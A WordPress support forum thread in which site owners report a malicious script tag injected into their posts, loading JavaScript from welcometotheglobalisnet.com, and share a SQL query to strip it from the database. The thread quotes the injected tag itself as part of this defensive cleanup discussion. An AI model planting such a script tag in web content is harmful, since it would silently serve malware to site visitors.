WordPress.org

Ready to get started?Download WordPress

Forums

New "welcometotheglobalisnet" malware script targetting wp sites (7 posts)

  1. theshine
    Member
    Posted 3 years ago #

    This malicious script tag showed up on my site today.

    <script src "http://welcometotheglobalisnet.com/js.php?kk=25′></script>

    There is a little about it over here. Anyone got any ideas for a cleaner.
    http://blog.sucuri.net/2011/02/hilary-kneber-godaddy-and-welcometotheglobalisnet-com.html#more-1564

  2. theshine
    Member
    Posted 3 years ago #

    Here's how I disinfected the virus, hopefully that's it:
    UPDATE wp_posts
    SET post_content=(
    REPLACE (post_content,
    '<script src=\"http://welcometotheglobalisnet.com/js.php?kk=25\"></script>',
    ''));

    Any advice on hardening?

  3. migrationology
    Member
    Posted 3 years ago #

    Hi, I have the same problem now, where did you post that command?

  4. theshine
    Member
    Posted 3 years ago #

    You need to execute that command in your SQL server client. If you have GoDaddy, then you will need to login to PHPMyAdmin.

  5. migrationology
    Member
    Posted 3 years ago #

    I restored my files on GoDaddy to 4 days ago and it seems to have worked, but now my site is flagged by google.
    Do you think I still need to command?

  6. theshine
    Member
    Posted 3 years ago #

    The script doesn't live in the files, it lives in the database (at least that was the case for me). GoDaddy backs up files regularly, but not databases (at least not on-site). If you don't see the script on your site anymore, you might be OK, but it really can't hurt to run the SQL script. Make sure you back up your database before you attempt to make the changes though.

  7. migrationology
    Member
    Posted 3 years ago #

    Thanks so much for your help!

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags